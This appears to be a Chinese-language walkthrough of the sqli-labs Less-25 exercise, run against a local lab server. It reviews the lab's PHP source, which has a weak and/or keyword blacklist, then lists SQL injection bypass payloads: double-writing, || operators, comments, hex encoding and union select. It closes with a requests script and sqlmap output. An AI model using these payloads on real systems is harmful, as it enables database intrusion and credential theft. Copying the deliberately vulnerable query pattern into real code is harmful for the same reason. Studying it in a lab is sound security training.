sqli-lab-less25
一、靶标地址
Less-25 GET-Error based-All your OR&AND belong to us-string single quote
#基于报错 过滤and 过滤or
http://127.0.0.1/sqli/less-25/
二、漏洞探测
http://127.0.0.1/sqli/Less-25/index.php?id=1' and 1=1
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
#Hint: Your Input is Filtered with following result: 1'
#猜测语句'1'' LIMIT 0,1
#推断语句为select * from users where id='$id' limit 0,1;
http://127.0.0.1/sqli/Less-25/index.php?id=1' and 1=1
#Hint: Your Input is Filtered with following result: 1' 1=1
#过滤了and和or
三、源码分析
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
//fiddling with comments
$id= blacklist($id);
//echo "<br>";
//echo $id;
//echo "<br>";
$hint=$id;
// connectivity
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo "<font size='5' color= '#99FF00'>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
}
else
{
echo "Please input the ID as parameter with numeric value";
}
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/AND/i',"", $id); //Strip out AND (non case sensitive)
// `/or/i`:这是正则表达式模式,其中:
// - `/` 是正则表达式的分隔符,表示模式的开始和结束。
// - `or` 是要匹配的字符串,表示字母 "o" 后跟字母 "r"。
// - `i` 是正则表达式的修饰符,表示不区分大小写进行匹配。
return $id;
}
?>
四、黑盒与白盒测试
1、绕过去除and和or的sql注入的基础知识
(1)Mysql中的大小写不敏感,大写与小写一样
(2)Mysql中的十六进制与URL编码,Mysql可以对其解码
(3)关键字替换and和&&、or和||两者含义相同
(4)内联注释与多行注释/*!内联注释*/ /*多行注释*/
2、绕过策略
(1)大小写变形绕过
Or,OR,oR,OR,And,ANd,AND等
$id= preg_replace('/or/i',"", $id)
$id= preg_replace('/AND/i',"", $id);
// - `i` 是正则表达式的修饰符,表示不区分大小写进行匹配。
(2)注释绕过
http://127.0.0.1/sqli/Less-25/?id=-1' a/*!*/nd 1=1 --+
#Hint: Your Input is Filtered with following result: -1' a/*!*/nd 1=1 --
#失败
http://127.0.0.1/sqli/Less-25/?id=-1' a/**/nd 1=1 --+
#Hint: Your Input is Filtered with following result: -1' a/**/nd 1=1 --
(3)双写绕过
http://127.0.0.1/sqli/Less-25/?id=-1' aandnd 1=1 --+
#Hint: Your Input is Filtered with following result: -1' and 1=1 --
#成功
(4)符号绕过
http://127.0.0.1/sqli/Less-25/?id=-1' && 1=1 --+
#Hint: Your Input is Filtered with following result: -1'
#失败
http://127.0.0.1/sqli/Less-25/?id=-1' || 1=1 --+
#Hint: Your Input is Filtered with following result: -1' || 1=1 --
#成功
(5)编码绕过
url编码
http://127.0.0.1/sqli/Less-25/?id=-1' and 1=1 --+
http://127.0.0.1/sqli/Less-25/?id=-1'%20and%201=1%20--+
#Hint: Your Input is Filtered with following result: -1' 1=1 --
#失败
16进制编码
#16进制直接拼接即可
http://127.0.0.1/sqli/Less-25/?id=0x2d0x310x270x200x610x6e0x640x200x310x3d0x310x200x2d0x2d0x2b
#Hint: Your Input is Filtered with following result: 0x2d0x310x270x200x610x6e0x640x200x310x3d0x310x200x2d0x2d0x2b
#成功无回显
(6)联合查询绕过
#适用and/or基于报错,而是使用union的基于报错或者直接联合查询
http://127.0.0.1/sqli/Less-25/?id=-1' union select 1,2,3 --+
#Hint: Your Input is Filtered with following result: -1' union select 1,2,3 --
ps:特别注意的点
应在脱库时主要用到的information、floor、rand等函数或者数据库名,也存在or和and的名字
五、脚本撰写
import requests
url="http://127.0.0.1/sqli/less-25/index.php?id=-1"
#F12查看或者burpsuite抓包
header={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36','Accept-Language': 'en-US,en;q=0.9',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
payload="'--+"
response=requests.get(url+payload,headers=header)
print(response.text)
#根据回显来确定
六、sqlmap
sqlmap -u "http://127.0.0.1/sqli/Less-25/?id=1" --batch
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' RLIKE (SELECT (CASE WHEN (9223=9223) THEN 1 ELSE 0x28 END))-- uwXx
Type: time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind
Payload: id=1' RLIKE SLEEP(5)-- Necj
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: id=-1640' UNION ALL SELECT NULL,NULL,CONCAT(0x717a7a6a71,0x7867436271774d577a656d554a44766b496f7149784d45636b6e594a6b6679494f42506c6e425562,0x716a7a7a71)#
七、总结
1、绕过and和or的方法包括
内联注释
双写绕过
大小写绕过
符号绕过
编码绕过
联合查询绕过
2、应注意在脱裤时包含or和and的字符